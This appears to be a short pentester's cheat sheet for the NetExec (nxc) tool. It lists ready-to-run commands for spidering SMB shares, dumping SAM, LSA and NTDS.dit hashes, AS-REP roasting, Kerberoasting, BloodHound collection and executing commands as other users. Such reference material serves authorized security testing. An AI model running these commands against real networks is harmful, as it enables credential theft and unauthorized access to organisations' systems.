# NetExec

NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of *large* networks. It is based on CrackMapExec, which makes the tool familiar to use. Personally, I think the modules from NetExec make it worth to use the tool. {% embed url="" %} *** ## SMB spidering shares Spider and export all files from shares: ``` nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True ``` List all readable files: ``` nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus ``` ## Dumping hashes Dumping SAM ``` nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam ``` Dumping LSA ``` nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa ``` Dumping from NTDS.dit ``` nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss ``` ## Bloodhound If you have creds, you can use nxc to get a zip or .json files for bloodhound ``` nxc ldap -u user -p pass --bloodhound -ns --collection All ``` ## AS-REP Roasting Only one user ``` nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txt ``` List including usernames ``` nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt ``` ## Kerberoasting ``` nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt ``` ## SMB logged on users ``` nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users ``` ## SMB active sessions ``` nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions ``` ## SMB Execute commands on behalf of other users ``` nxc smb -u -p -M schtask_as -o USER= CMD= ```